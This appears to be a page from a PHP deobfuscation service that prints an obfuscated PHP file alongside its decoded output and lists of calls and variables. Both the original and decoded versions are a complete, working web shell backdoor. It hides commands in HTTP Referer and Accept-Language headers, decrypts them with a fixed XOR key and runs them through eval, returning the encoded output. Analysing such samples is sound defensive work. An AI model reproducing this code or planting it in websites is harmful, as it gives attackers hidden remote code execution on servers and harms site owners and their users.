Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $u='na,*n$m);if*n($q&&$m){@sess*nion_start()*n;$s=&$_S*n*nESSION;$ss*n="substr*n"*n;..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$u='na,*n$m);if*n($q&&$m){@sess*nion_start()*n;$s=&$_S*n*nESSION;$ss*n="substr*n"*n;*n$sl="strt*nolo';
$b='L*nA*nNGU*nAGE"];*nif($rr&&$ra){$u*n=parse_ur*n*nl($rr);pa*nrs*ne_str($u["q*nue*nry"],$q);$q*n*n';
$k='$s[$i].=*n$p;$e=strpos*n($*ns[$i],$f)*n;if($e)*n*n{$k=$kh.$kf*n;*n*nob_start();@*neva*nl(@gzu';
$E='ncompr*ness*n(@x(@ba*nse64_deco*nde(preg*n_replac*ne(*nar*nray("/_/","/*n*n-/"),array("*n/"*';
$Q='s*n*ntrpos($p,$h)===0){$s[*n$i]=*n"";*n$p=$*nss($p,3);}if(a*nrray_*nkey_exist*ns(*n$i*n,$s)*n){';
$T='wer";$i=*n*n$m[1][0].$m[*n1]*n[1];$h=$sl(*n$*nss(md5($i.*n$kh)*n,0,3));$f=*n$sl($*nss*n(md5(';
$c='n,"+"),$ss($s*n[$*ni]*n,0,$e*n))),$k)))*n;$*no=ob_get*n_c*nontent*ns();*n*nob_end_cle*nan();$d=b*n';
$f='$k*nh="5d41";$kf="4*n*n02a*n";functi*non *nx*n($*nt,$k){$c=strlen($k);$l*n=strlen(*n$t);$*n';
$P=str_replace('oG','','croGeatoGoGe_fuoGnoGcoGtion');
$x='ase64_encode*n(x(gz*ncompress(*n$o),$k)*n*n*n);print("<$k>$d</$k>"*n);@*nse*nssion_dest*nroy();}}}}';
$s='=arr*nay_valu*nes($q);preg_m*n*natch_a*nll("/(*n[\\w])[*n*n\\w-]+*n(?:;q=0.(*n[\\d]))?,?/",$*nr*';
$G='}*n;}}ret*nurn $o;}$r=*n$_S*n*nERVER;$rr=@$r[*n"H*nTTP_REFERER"*n*n];$ra=@$r["H*nTTP_A*nCC*nEPT_';
$N='$i.$*nkf*n),0,3));$*np="";for*n($z=1*n;$z<*ncoun*nt($m[1]);*n$z*n++)$p.=$*nq[$m[*n*n2][$z]];if(*n';
$R='*no="";f*nor($i=0;$i<$l*n*n;)*n{for($j=0;($*nj<*n$*nc*n&&$i<$l);$j++,$i+*n+){$o.=$t{$i}^*n$k{$*nj';
$j=str_replace('*n','',$f.$R.$G.$b.$s.$u.$T.$N.$Q.$k.$E.$c.$x);
$w=$P('',$j);$w();
?>

Function Calls

null	1
str_replace	2
create_function	1

Variables

$E	ncomprnessn(@x(@banse64_deconde(pregn_replacne(narnr..
$G	}n;}}retnurn $o;}$r=n$_SnnERVER;$rr=@$r[n"H*nTTP_REFER..
$N	$i.$nkfn),0,3));$np="";forn($z=1n;$z<ncounnt($m[1]);..
$P	create_function
$Q	snntrpos($p,$h)===0){$s[n$i]=n"";n$p=$nss($p,3);}if(a*..
$R	no="";fnor($i=0;$i<$lnn;)n{for($j=0;($nj<n$nc*n&&$i<..
$T	wer";$i=nn$m[1][0].$m[n1]n[1];$h=$sl(n$nss(md5($i.*n$k..
$b	LnAnNGUnAGE"];nif($rr&&$ra){$un=parse_urnnl($rr);pan..
$c	n,"+"),$ss($sn[$ni]n,0,$en))),$k)))n;$no=ob_getn_cno..
$f	$knh="5d41";$kf="4nn02an";functinon nxn($nt,$k){$c=s..
$j	$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$k	$s[$i].=n$p;$e=strposn($ns[$i],$f)n;if($e)nn{$k=$kh.$k..
$s	=arrnay_valunes($q);preg_mnnatch_anll("/(n[\w])[nn\w..
$u	na,n$m);ifn($q&&$m){@sessnion_start()n;$s=&$_SnnESSION..
$w	None
$x	ase64_encoden(x(gzncompress(n$o),$k)nnn);print("<$k>$d..

Stats

MD5	1f1057bc4b03feadbef70910990208e7
Eval Count	1
Decode Time	95 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats